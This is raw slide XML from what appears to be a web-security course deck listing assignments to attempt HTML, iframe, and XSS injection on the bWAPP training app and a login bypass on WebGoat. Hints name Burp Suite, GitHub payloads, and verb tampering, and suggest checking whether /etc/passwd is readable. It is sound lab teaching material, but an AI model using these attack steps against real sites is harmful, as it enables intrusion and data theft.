        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#24c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt html injection attack-stored on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> login </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite intercept attack or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads; use normal html code, marque payload, a login form payload and insert in blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196275766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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#25a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt iframe injection attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite intercept attack or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads ; change the URL to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> buster listings and see if iframe loads it ; change height, width of the iframe from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ; see if /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd is accessible]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127123323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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#25b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt iframe injection attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and html injection together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite intercept attack ; close the iframe ; add html code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> execute the vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355907161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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#25b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt CSS/XSS injection attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> login </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite hack bar or manual intercept attack or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1149092474"/>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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#26</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt broken access control vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login bypass on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Challenges  Voting without login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite intercept, repeater, basic auth, verb tampering, check source code]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5393954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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
